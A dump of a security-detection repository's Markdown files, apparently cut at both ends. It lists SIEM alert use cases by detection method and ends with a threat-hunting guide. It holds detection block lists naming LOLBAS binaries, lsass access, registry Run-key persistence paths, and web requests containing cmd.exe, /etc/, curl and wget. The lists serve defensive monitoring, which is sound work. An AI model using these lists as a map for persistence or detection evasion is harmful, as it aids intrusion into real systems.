- Source System, Destination System, Protocol=UDP where Source System Count exceeds threshold 36 | - Source System, Destination System, Protocol=UDP where Destination System Count exceeds threshold 37 | - Source System, Protocol=TCP where Count exceeds threshold 38 | - Destination System, Protocol=TCP where Count exceeds threshold 39 | 40 | 41 | # Log Source Examples 42 | - Layer 3 or 7 Firewall Logs 43 | 44 | 45 | # Possible False Positives 46 | -------------------------------------------------------------------------------- /Tactics/Network-Activity-by-Process.md: -------------------------------------------------------------------------------- 1 | # Network Activity by Process Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | 8 | 9 | ## Blacklist Alert 10 | - mstsc.exe from an unexpected source user 11 | - wscript.exe 12 | - cscript.exe 13 | - bitsadmin.exe 14 | 15 | 16 | ## Whitelist Alert 17 | - Unexpected Process Names with network activity 18 | 19 | 20 | ## Levenshtein Score Alert 21 | - Processes Matching or Similar to System Processes in Unexpected Directories 22 | 23 | 24 | ## Rolling Whitelist Alert 25 | - Newly observed Process 26 | - Newly observed Port 27 | - Newly observed Source Port 28 | - Newly observed Source Port Name 29 | - Newly observed Destination Port 30 | - Newly observed Destnation Port Name 31 | 32 | 33 | ## Shannon Entropy Score Alert 34 | - Processes with Random Names 35 | 36 | 37 | ## Threshold Alert 38 | - Source System, Destination System, Protocol=UDP where Source System Count exceeds threshold 39 | - Source System, Destination System, Protocol=UDP where Destination System Count exceeds threshold 40 | - Source System, Protocol=TCP where Count exceeds threshold 41 | - Destination System, Protocol=TCP where Count exceeds threshold 42 | - Bytes In Total, Bytes Out Total, Bytes In/Out Ratio where Bytes In/Out Ratio exceeds threshold 43 | - Connection Length where Connection Length exceeds threshold 44 | 45 | 46 | # Log Source Examples 47 | - Sysmon Event ID 3 48 | 49 | 50 | # Possible False Positives 51 | -------------------------------------------------------------------------------- /Tactics/Network-Full-Packet-Capture.md: -------------------------------------------------------------------------------- 1 | # Network Activity by Full Packet Capture Use Cases 2 | 3 | 4 | Grouped by [Detection Method](/Detection-Methods.md) 5 | 6 | 7 | ## Aggregate Count 8 | 9 | 10 | 11 | ## Blacklist Alert 12 | - Certificate Expired 13 | - Certificate is Self-Signed 14 | - Certificate Algorithm is Weak 15 | - Certificate Validity Exceeds 3 Years 16 | - Certificate Common Name Has no Periods 17 | - Certificate With Blank Fields 18 | 19 | 20 | ## Whitelist Alert 21 | - Certificate with Invalid Country Code/State 22 | 23 | 24 | ## Levenshtein Score Alert 25 | 26 | 27 | ## Rolling Whitelist Alert 28 | 29 | 30 | ## Shannon Entropy Score Alert 31 | 32 | 33 | ## Threshold Alert 34 | 35 | 36 | # Log Source Examples 37 | - Network IDS Logs 38 | - Layer 7 Firewall Logs 39 | 40 | 41 | # Possible False Positives 42 | -------------------------------------------------------------------------------- /Tactics/Process-Access.md: -------------------------------------------------------------------------------- 1 | # Process Access Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | Observe general process behavior with the goal of understanding normal and detecting anomalies. Use of multiple visualizations, tables, and aggregation methods is recommended. Any confirmed malicious behavior from this use case should be considered as a foundation for a new alert. 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | - Process accesses %WINDIR%\System32\lsass.exe 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | 22 | ## Rolling Whitelist Alert 23 | - Newly observed Source Process and Destination Process 24 | 25 | 26 | ## Shannon Entropy Score Alert 27 | 28 | 29 | ## Threshold Alert 30 | 31 | 32 | # Log Source Examples 33 | - Sysmon Event ID 10 34 | 35 | 36 | # Possible False Positives 37 | -------------------------------------------------------------------------------- /Tactics/Process-Execution.md: -------------------------------------------------------------------------------- 1 | # Process Execution Use Cases 2 | 3 | This use case is purposefully separated from commandline activity. These detections assume you have all process execution details other than commandline (process name, PID, full path, etc.) 4 | 5 | Grouped by [Detection Method](/Detection-Methods.md) 6 | 7 | MITRE ATT&CK Framework: 8 | 9 | - Observe general process execution with the goal of understanding normal and detecting anomalies. Use of multiple visualizations, tables, and aggregation methods is recommended. Any confirmed malicious behavior from this use case should be considered as a foundation for a new alert. 10 | 11 | ## Match Alarm 12 | - Alternate Data Stream Use 13 | - Process command line contains regex \.[\w]+: 14 | 15 | - Execution of sysinternals processes (include name.exe and name64.exe variants) 16 | - pslist.exe 17 | - psservice.exe 18 | - psexec.exe 19 | - psgetsid.exe 20 | - pskill.exe 21 | - pkill.exe 22 | - psloggedon.exe 23 | - psfile.exe 24 | - PipeList.exe 25 | - AccessChk.exe 26 | - AccessEnum.exe 27 | - LogonSessions.exe 28 | - PsLogList.exe 29 | - PsInfo.exe 30 | - PsPasswd.exe 31 | - ru.exe 32 | - procdump.exe 33 | - ShellRunas.exe 34 | - LoadOrd.exe 35 | - LoadOrdC.exe 36 | - regsize.exe 37 | 38 | - Unexpected invocation of system executables (LOLBAS) 39 | - appcmd.exe (t1218) 40 | - at.exe 41 | - atbroker.exe (t1015) 42 | - attrib.exe (t1158) 43 | - bash.exe (t1202) 44 | - bitsadmin.exe (t1197) 45 | - certutil.exe (t1202) 46 | - cscript.exe (T1202) 47 | - cmdkey.exe (t1087) 48 | - compmgmtlauncher.exe (TA0043) 49 | - computerdefaults.exe (t1088) 50 | - control.exe (t1202) 51 | - dcsync.exe 52 | - dism.exe (t1088) 53 | - displayswitch.exe (t1015) 54 | - esentutl.exe (t1003) 55 | - find.exe (TA0043) 56 | - findstr.exe (t1081) 57 | - fodhelper.exe (t1088) 58 | - fodhelper.exe (t1088) 59 | - forfiles.exe (t1222) 60 | - fsutil.exe (TA0043) 61 | - hh.exe (t1047) 62 | - hostname.exe (TA0043) 63 | - icacls.exe (t1222) 64 | - ipconfig.exe (TA0043) 65 | - jjs.exe (t1218) 66 | - klist.exe (pass-the-ticket) 67 | - klist.exe (t1087) 68 | - magnify.exe (t1015) 69 | - makecab.exe 70 | - mofcomp.exe (t1047) 71 | - MSBuild.exe (T1127) 72 | - mshta.exe (t1170) 73 | - narrator.exe (t1015) 74 | - nbtstat.exe (t1016) 75 | - net.exe (TA0043) 76 | - net1.exe (TA0043) 77 | - netsh.exe (t1063) 78 | - netstat.exe (t1049) 79 | - nltest.exe (t1033) 80 | - nslookup.exe (t1016) 81 | - odbcconf.exe (t1073) 82 | - osk.exe (t1015) 83 | - pcalua.exe (t1202) 84 | - ping.exe (TA0043) 85 | - powershell.exe (T1086) 86 | - powershell_ise.exe (T1086) 87 | - psexec.exe 88 | - psexesvc.exe 89 | - qprocess.exe (t1057) 90 | - query.exe (t1057) 91 | - quser.exe (t1033) 92 | - qwinsta.exe (t1057) 93 | - reg.exe (t1112) 94 | - regasm.exe (t1121) 95 | - regsvcs.exe (t1121) 96 | - regsvr32.exe (t1117) 97 | - replace.exe (t1218) 98 | - robocopy.exe (t1074) 99 | - route.exe (t1016) 100 | - runas.exe (t1134) 101 | - rwinsta.exe (t1057) 102 | - sc.exe (t1031) 103 | - schtasks.exe (t1053) 104 | - scrcons.exe (t1047) (parent process of wmi ActiveScriptConsumers) 105 | - sdbinst.exe (t1138) 106 | - set.exe (TA0043) 107 | - sethc.exe (t1015) 108 | - syncappvpublishingserver.exe (t1218) 109 | - systeminfo.exe (t1033) 110 | - takeown.exe (t1222) 111 | - taskeng.exe (t1053) 112 | - taskkill.exe (t1112) 113 | - tasklist.exe (t1057) 114 | - time.exe (TA0043) 115 | - tracert.exe (TA0043) 116 | - tree.com (t1016) 117 | - utilman.exe (t1015) 118 | - vds.exe (TA0043) 119 | - vdsldr.exe (TA0043) 120 | - ver.exe (TA0043) 121 | - vssadmin.exe (t1490) 122 | - wevtutil.exe (t1070) 123 | - where.exe (t1081) 124 | - whoami.exe (t1033) 125 | - winrm.cmd (t1028) 126 | - winrs.exe (t1202) 127 | - winrshost.exe (TA0043) 128 | - winver.exe (TA0043) 129 | - wmic.exe (TA0043) 130 | - wmiprvse.exe (t1047) 131 | - wscript.exe (T1202) 132 | - wsmprovhost.exe (t1028) 133 | - wusa.exe 134 | - xcopy.exe (t1074) 135 | 136 | 137 | - System process with suspicious starting location 138 | - backgroundTaskHost.exe not starting from c:\windows\system32\ 139 | - CompPkgSrv.exe not starting from c:\windows\system32\ 140 | - conhost.exe not starting from c:\windows\system32\ 141 | - csrss.exe not starting from c:\windows\system32\ 142 | - ctfmon.exe not starting from c:\windows\system32\ 143 | - dasHost.exe not starting from c:\windows\system32\ 144 | - dllhost.exe not starting from c:\windows\system32\ 145 | - dwm.exe not starting from c:\windows\system32\ 146 | - explorer.exe not starting from c:\windows\ 147 | - iexplore.exe not starting from c:\program files\internet explorer\ 148 | - lsass.exe not starting from c:\windows\system32\ 149 | - ntoskrnl.exe not starting from c:\windows\system32\ 150 | - RuntimeBroker.exe not starting from c:\windows\system32\ 151 | - services.exe not starting from c:\windows\system32\ 152 | - splwow64.exe not starting from c:\windows\ 153 | - svchost.exe not starting from c:\windows\system32\ 154 | - taskhostw.exe not starting from c:\windows\system32\ 155 | - taskmgr.exe not starting from c:\windows\system32\ 156 | - wininit.exe not starting from c:\windows\system32\ 157 | - winlogon.exe not starting from c:\windows\system32\ 158 | 159 | - System process with suspicious parent process 160 | - taskhost.exe with a parent other than services.exe 161 | - lsass.exe with a parent other than wininit.exe 162 | - iexplore.exe with a parent other than explorer.exe 163 | - explorer.exe with a parent other than userinit.exe 164 | - winlogon.exe with a parent other than smss.exe 165 | - wininit.exe with a parent other than smss.exe 166 | - smss.exe with a parent process other than System 167 | - csrss.exe with a parent other than smss.exe 168 | - services.exe with a parent other than wininit.exe 169 | - svchost.exe with a parent other than services.exe 170 | - lsm.exe with a parent other than wininit.exe 171 | - eventvwr.exe with a parent process other than mmc.exe (T1088) 172 | - wmiprvse.exe with a parent process other than svchost.exe 173 | 174 | - System process with suspicious owner 175 | - csrss.exe with an owner other than Local System 176 | - smss.exe with an owner other than Local System 177 | - services.exe with an owner other than Local System 178 | - wininit.exe with an owner other than Local System 179 | - lsass.exe with an owner other than Local System 180 | - lsm.exe with an owner other than Local System 181 | - winlogon.exe with an owner other than Local System 182 | 183 | - Microsoft process name without digital signature 184 | - svchost.exe 185 | - services.exe 186 | - smss.exe 187 | - lsass.exe 188 | - csrss.exe 189 | - wininit.exe 190 | - taskhostw.exe 191 | - runtimebroker.exe 192 | 193 | - Executable running from $Recylce.Bin 194 | - Executable running from \System Volume Information 195 | - Executable running from \Temp folders 196 | 197 | ## Aggregate Count 198 | - Suspicious child process of system executables 199 | - notepad.exe 200 | - regsvr32.exe 201 | - rundll32.exe 202 | - mshta.exe 203 | 204 | 205 | ## Blacklist Alert 206 | - Executables masquerading as c:\windows system files running from bad paths (blacklist of processes expected in c:\windows\) 207 | - Executables masquerading as c:\windows\sysem32 system files running from bad paths (blacklist of processes expected in c:\windows\system32\) 208 | - Executables running from any folder with TEMP in the path 209 | 210 | - Administrator account running "daily use" applications (blacklist of admin names) 211 | - chrome.exe 212 | - iexplore.exe 213 | - MicrosoftEdge.exe 214 | - msedge.exe 215 | - firefox.exe 216 | - brave.exe 217 | 218 | 219 | - cmd.exe with following parent names 220 | - w3wp.exe 221 | - wmiprvse.exe 222 | 223 | 224 | - powershell*.exe with a parent process of 225 | - w3wp.exe 226 | - wmiprvse.exe 227 | 228 | 229 | ## Whitelist Alert 230 | - A file with a non-executable extension is executed (whitelist of extensions) 231 | - bat, bin, cmd, com, cpl, exe, gadget, inf, ins, inx, isu, job, jse, lnk, msc, msi, msp, mst, paf, pif, ps1, reg, rgs, scr, sct, shb, shs, u3p, vb, vbe, vbs, vbscript, ws, wsf, wsh 232 | 233 | - Unexpected process from non-admin/helpdesk/developer (whitelist of admins, etc) 234 | - ipconfig.exe (T1016) 235 | - powershell.exe (T1086) 236 | - powershell_ise.exe (T1086) 237 | - net.exe ran (T1018) 238 | - mstsc.exe 239 | - python*.exe 240 | 241 | - Unexpectd Source Process is Office Products (T1137) 242 | - excel.exe 243 | - winword.exe 244 | - powerpnt.exe 245 | - outlook.exe 246 | - msaccess.exe 247 | - mspub.exe 248 | 249 | 250 | - Unrecognized processes with owner of 'NT AUTHORITY\SYSTEM' (whitelist of expected full process paths) 251 | - Unrecognized processes with owner of 'NETWORK SERVICE' (whitelist of expected full process paths) 252 | 253 | - Unrecognized process starting from c:\windows\ (T1036) (whitelist of processes expected) 254 | - ```Get-ChildItem c:\windows\*.exe | select name``` 255 | - Unrecognized process starting from c:\windows\system32\ (T1036) (whitelist of processes expected) 256 | - ```Get-ChildItem c:\windows\system32\*.exe | select name``` 257 | - Unrecognized process starting from c:\windows\winsxs\ (T1036) (whitelist of processes expected) 258 | - ```Get-ChildItem c:\windows\winsxs\*.exe | group-object | select name``` 259 | 260 | - SYSTEM account launching processes other than 261 | - (WIP) 262 | 263 | 264 | ## Levenshtein Score Alert 265 | - Processes with filenames that closely resemble system files. 266 | 267 | 268 | ## Rolling Whitelist Alert 269 | - Source Process=cmd.exe, Newly observed Child Process 270 | - Source Process=powershell.exe, Newly observed Child Process 271 | - Source Process=powershell_ise.exe, Newly observed Child Process 272 | - Executing items on list [LOLBAS](https://github.com/LOLBAS-Project/LOLBAS), Newly observed User 273 | - Source Process Path=c:\windows\, newly observed process 274 | - Source Process Path=c:\windows\system32\, newly observed process 275 | - Source Process Path=c:\windows\syswow64\, newly observed process 276 | - Source Process Path=c:\windows\fonts\, newly observed process 277 | - Source Process Path=C:\$Recycle.Bin\, newly observed process 278 | - Source Process Path=c:\windows\system32\, newly observed process 279 | - Source Process Path=c:\system volume information\, newly observed process 280 | - Source Process Path=C:\ProgramData\, newly observed process 281 | - source Process=wmiprvse.exe, newly observed child process 282 | 283 | 284 | ## Shannon Entropy Score Alert 285 | - Processes executed with randomized file names. 286 | 287 | 288 | ## Threshold Alert 289 | - Command Length where Command Length exceeds threshold 290 | 291 | 292 | # Log Source Examples 293 | - Windows Security Event ID 4688 294 | - Secpol.exe > Advanced Audit Policy Configuration > System Audit Policies > Detailed Traking > Audit Process Creation: Enabled, Success 295 | - gpedit.msc > Computer Configuration > Administrative Templates > System > Audit Process Creation > Include command line in process creation events: Enabled 296 | - Sysmon Event ID 1 297 | 298 | 299 | # Possible False Positives 300 | - Generally a lot of false positives can be expected from this log source. Understanding normal operating system, trusted application, user norms, and business norms is expected to efficiently tune down noise over time. 301 | 302 | 303 | # Resources 304 | - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf 305 | - https://lolbas-project.github.io 306 | -------------------------------------------------------------------------------- /Tactics/Registry-Creation.md: -------------------------------------------------------------------------------- 1 | # File Access Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ### Match Alert 7 | - Startup items 8 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Run" 9 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunOnce" 10 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" 11 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" 12 | - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" 13 | - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" 14 | - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" 15 | - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" 16 | - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" 17 | 18 | - Services 19 | - "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services" 20 | - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" 21 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" 22 | - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" 23 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunServices" 24 | 25 | - UAC bypass 26 | - "HKU\*\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA" 27 | - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA" 28 | 29 | - Others 30 | - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell" 31 | - "HKU\{SID}\Software\Microsoft\Windows NT\CurrentVersion\Windows" 32 | - "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\" 33 | - "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\" 34 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" 35 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" 36 | - "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" 37 | - "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" 38 | 39 | 40 | ## Aggregate Count 41 | 42 | 43 | ## Blacklist Alert 44 | 45 | 46 | 47 | ## Whitelist Alert 48 | 49 | 50 | ## Levenshtein Score Alert 51 | 52 | 53 | ## Rolling Whitelist Alert 54 | 55 | 56 | ## Shannon Entropy Score Alert 57 | 58 | 59 | ## Threshold Alert 60 | 61 | 62 | # Log Source Examples 63 | 64 | 65 | # Possible False Positives 66 | -------------------------------------------------------------------------------- /Tactics/Registry-Modification.md: -------------------------------------------------------------------------------- 1 | # Registry Modification Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Aggregate Count 6 | 7 | 8 | ## Blacklist Alert 9 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Run" 10 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunOnce" 11 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" 12 | - "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" 13 | - "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" 14 | - "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" 15 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" 16 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" 17 | - "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" 18 | - "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" 19 | - "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" 20 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" 21 | - "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" 22 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunServices" 23 | - "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" 24 | - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" 25 | - "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" 26 | - "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell" 27 | - "HKU\{SID}\Software\Microsoft\Windows NT\CurrentVersion\Windows" 28 | 29 | 30 | ## Whitelist Alert 31 | 32 | 33 | ## Levenshtein Score Alert 34 | 35 | 36 | ## Rolling Whitelist Alert 37 | 38 | 39 | ## Shannon Entropy Score Alert 40 | 41 | 42 | ## Threshold Alert 43 | 44 | 45 | # Log Source Examples 46 | 47 | 48 | # Possible False Positives 49 | -------------------------------------------------------------------------------- /Tactics/Resource-Consumption.md: -------------------------------------------------------------------------------- 1 | # Resource Consumption Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Aggregate Count 6 | 7 | 8 | ## Blacklist Alert 9 | 10 | 11 | ## Whitelist Alert 12 | 13 | 14 | ## Levenshtein Score Alert 15 | 16 | 17 | ## Rolling Whitelist Alert 18 | 19 | 20 | ## Shannon Entropy Score Alert 21 | 22 | 23 | ## Threshold Alert 24 | - High CPU/Memory Usage over X Minutes 25 | 26 | 27 | # Log Source Examples 28 | 29 | 30 | # Possible False Positives 31 | -------------------------------------------------------------------------------- /Tactics/Scheduled-Task-Creation.md: -------------------------------------------------------------------------------- 1 | # Scheduled Task Creation Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | MITRE ATT&CK Framework: [Scheduled Task/Job (T1053)](https://attack.mitre.org/techniques/T1053/005/), [Scheduled Task (T1053.005)](https://attack.mitre.org/techniques/T1053/) 6 | 7 | ## Match Alert 8 | 9 | 10 | ## Aggregate Count 11 | 12 | 13 | ## Blacklist Alert 14 | 15 | 16 | ## Whitelist Alert 17 | - Anomalous Scheduled Task Creator 18 | 19 | ## Levenshtein Score Alert 20 | 21 | 22 | ## Rolling Whitelist Alert 23 | - Newly observed Scheduled Task Name 24 | 25 | ## Shannon Entropy Score Alert 26 | 27 | 28 | ## Threshold Alert 29 | 30 | 31 | # Log Source Examples 32 | - Windows Security Event ID 4698 33 | 34 | 35 | # Possible False Positives 36 | -------------------------------------------------------------------------------- /Tactics/Service-Creation.md: -------------------------------------------------------------------------------- 1 | # Service Creation Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | MITRE ATT&CK Framework: [New Service (T1050)](https://attack.mitre.org/techniques/T1050), [Service Execution (T1035)](https://attack.mitre.org/techniques/T1035/) 6 | 7 | - Service creation can be used by an adversary to achieve persistence. 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## Blacklist Alert 13 | 14 | 15 | ## Whitelist Alert 16 | - Anomalous Services 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | - Newly observed Service File Name, Service Account 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | - Windows Security Event ID 4697 32 | 33 | 34 | # Possible False Positives 35 | -------------------------------------------------------------------------------- /Tactics/Service-Modification.md: -------------------------------------------------------------------------------- 1 | # Service Modification Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | MITRE ATT&CK Framework: [Modify Existing Service (T1031)](https://attack.mitre.org/techniques/T1031) 6 | 7 | - Service modification can be used by an adversary to achieve persistence. 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## Blacklist Alert 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | - Newly observed Source User 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | - AWS Cloudtrail 32 | - Azure 33 | - GCP 34 | 35 | # Possible False Positives 36 | -------------------------------------------------------------------------------- /Tactics/Web-Request.md: -------------------------------------------------------------------------------- 1 | # Web Request Use Cases 2 | 3 | 4 | Grouped by [Detection Method](/Detection-Methods.md) 5 | 6 | 7 | ## Aggregate Count 8 | - HTTP GET Method Counts 9 | - HTTP POST Method Counts 10 | - User Agent String Counts 11 | - Allow:Block Ratio per System/User 12 | - GET:POST Ratio per System/User 13 | - Up:Down Bytes Ratio per System/User 14 | - Newly-Registered Domains Visited (requres WHOIS enrichment) 15 | 16 | 17 | ## Blacklist Alert 18 | - URL containing "/etc/" 19 | - URL containing "/system32/" 20 | - URL containing "cmd.exe" 21 | - URL containing "command.exe" 22 | - URL containing "powershell.exe" 23 | - URL containing an IP Address 24 | - HTTPS request with 3 or more / (when no break-and-inspect is deployed, this signifies HTTP over port 443) 25 | - Known-bad User Agents 26 | - Suspicious User Agents 27 | - Contains "curl" 28 | - Contains "python" 29 | - Contains "Go-http-client" 30 | - Contains "wget" 31 | - Known-bad Domains 32 | - A privileged account generates any web traffic 33 | - A service account generates any web traffic 34 | - A system account generates any web traffic 35 | - User Agent string containing 'Nmap' 36 | - User Agent string containing 'pangolin' 37 | - User Agent string containing 'FHScan Core' 38 | - User Agent string containing 'DominoHunter' 39 | - User Agent string containing 'Grabber' 40 | - User Agent string containing 'CZ32ts' or 'czxt2s' 41 | 42 | 43 | ## Whitelist Alert 44 | - Newly Observed Domains 45 | - Web Traffic to Domains not in "Top Million" Lists 46 | 47 | 48 | ## Levenshtein Score Alert 49 | - Typosquatting company and trusted domains 50 | 51 | 52 | ## Rolling Whitelist Alert 53 | - Newly Observed User Agent 54 | 55 | 56 | ## Shannon Entropy Score Alert 57 | - High Entropy Domain Name 58 | 59 | 60 | ## Threshold Alert 61 | - User Name, Request URL Host, Bytes Out Total where Bytes Out Total out exceeds threshold 62 | - User Name, Allow Count, Block Count, Allow/Block Ratio where Allow/Block Ratio exceeds threshold 63 | - User Name, GET Total, Post+Put Total, GET:POST/Put Ratio where GET:POST/Put Ratio exceeds threshold 64 | - User Name, Bytes In Total, Bytes Out Total, Bytes In/Out Ratio Where Bytes In/Out Ratio exceeds threshold 65 | 66 | 67 | # Log Source Examples 68 | 69 | 70 | # Possible False Positives 71 | -------------------------------------------------------------------------------- /Tactics/Web-Server.md: -------------------------------------------------------------------------------- 1 | # Web Server Use Cases 2 | 3 | 4 | Grouped by [Detection Method](/Detection-Methods.md) 5 | 6 | 7 | ## Aggregate Count 8 | - HTTP GET Method Counts 9 | - HTTP POST Method Counts 10 | - User Agent String Counts 11 | - Allow:Block Ratio per System/User 12 | - GET:POST Ratio per System/User 13 | - Up:Down Bytes Ratio per System/User 14 | 15 | 16 | ## Blacklist Alert 17 | - URL containing "/etc/" 18 | - URL containing "/system32/" 19 | - URL containing "cmd.exe" 20 | - URL containing "command.exe" 21 | - URL containing "powershell.exe" 22 | - URL containing an IP Address 23 | - HTTPS request with 3 or more / (when no break-and-inspect is deployed, this signifies HTTP over port 443) 24 | - Known-bad User Agents 25 | - Suspicious User Agents 26 | - Contains "curl" 27 | - Contains "python" 28 | - Contains "Go-http-client" 29 | - Contains "wget" 30 | - User Agent string containing 'Nmap' 31 | 32 | 33 | ## Whitelist Alert 34 | 35 | 36 | ## Levenshtein Score Alert 37 | 38 | 39 | ## Rolling Whitelist Alert 40 | - Newly Observed User Agent 41 | 42 | 43 | ## Shannon Entropy Score Alert 44 | 45 | 46 | 47 | ## Threshold Alert 48 | 49 | 50 | # Log Source Examples 51 | 52 | 53 | # Possible False Positives 54 | -------------------------------------------------------------------------------- /Threat-Hunting.md: -------------------------------------------------------------------------------- 1 | 2 | # Threat Hunting 3 | The main goals of threat hunting are to 4 | - detect compromises that existing systems failed to detect. 5 | - minimize the impact of breaches by shrinking the breach detection gap. 6 | - convert hunts into automated detections. 7 | 8 | Other benefits of threat hunting are: 9 | - Identification of gaps in visibility necessary to detect and respond to a specific attacker TTP. 10 | - Identification of gaps in detection. 11 | - Development of new monitoring use cases and detection analytics. 12 | - Uncovering new threats and TTPs that feedback to the threat intelligence process. 13 | - Recommendations on new preventive measures. 14 | 15 | Threat hunting should focus on events outside the traditional detection capabilities, and may uncover missed or misinterpreted events during the hunt that can be used to improve detection and further train analysts. Threat hunting assumes that there already was a breach and that it has not been identified yet. 16 | 17 | # Models 18 | - Hypothesis-Driven 19 | - A supposition is made about potential threats and their activities that may be present on the organization’s network, then data and analysis are used to confirm or deny suspicion. 20 | - Intel-Driven 21 | - Information on TTPs and actor capabilities is where threat intelligence comes in play. Threat intelligence can be used to determine TTPs of attackers. Thus, threat hunting uses threat intelligence in its process. In turn, threat hunting activities may uncover new TTPs that have not been identified or disclosed yet. Hence, threat hunting can provide unique insights into threat actor capabilities and generate threat intelligence. 22 | - Baseline Hunts 23 | - A proactive approach to threat detection that involves setting up a baseline of normal activity, monitoring that baseline for deviations, and investigating any suspicious activity. 24 | - Custom/on-demand 25 | 26 | # Techniques 27 | - Indicator Search 28 | - Stack Counting (total count-based, AKA long-tail analysis) 29 | - Clustering (time-based counting) 30 | - Grouping (e.g. group up endpoints, then use other techniques) 31 | - Ratios (e.g. request/response, upload/download, success/failure) 32 | - Standard deviation 33 | 34 | # Frameworks 35 | - MITRE ATT&CK 36 | - Targeted Hunting integrating Threat Intelligence (TaHiTI) 37 | - Splunk's PEAK (Plan, Execute, Act, all with Knowledge) 38 | 39 | # Hunting Phases 40 | ## Planning Phase 41 | - Develop a hypothesis / Identify impactful intelligence / Establish a baseline 42 | - Research the involved technologies, tactics, techniques, threat actors 43 | - Determine relevant data sources 44 | - Determine scope of time 45 | - Plan the hunt 46 | 47 | ## Execution Phase 48 | - Query data sources 49 | - Ensure data/results are clean 50 | - Investigate/Analyze 51 | - Escalate any critical findings immediately 52 | - Test and refine hypothesis, if appropriate 53 | 54 | ## Action Phase 55 | - Document the hunt itself 56 | - Document findings 57 | - Create detections 58 | - Improve process 59 | - Report findings 60 | - Plan to redo hunt or scrap it 61 | 62 | General Examples: 63 | - An adversary acheived [tactic] via/to [technique]. 64 | - An adversary exploited the vulnerbility described in [CVE/Vulnerability]. 65 | - [Group/Campaign] activity has compromised an endpoint. 66 | - A(n) [Type] account has been compromised. 67 | - An adversary is using covert channels based on [protocol] to exfiltrate data from the organization 68 | - An adversary is levering [software] to automatically exfiltrate sensitive data from the organization. 69 | - An adversary is levering [hardware] to automatically exfiltrate sensitive data from the organization. 70 | - An adversary is using existing user accounts for lateral movement. 71 | - An adversary is leveraging web shells to retain access to the infrastructure. 72 | - An adversary is using malware with filenames 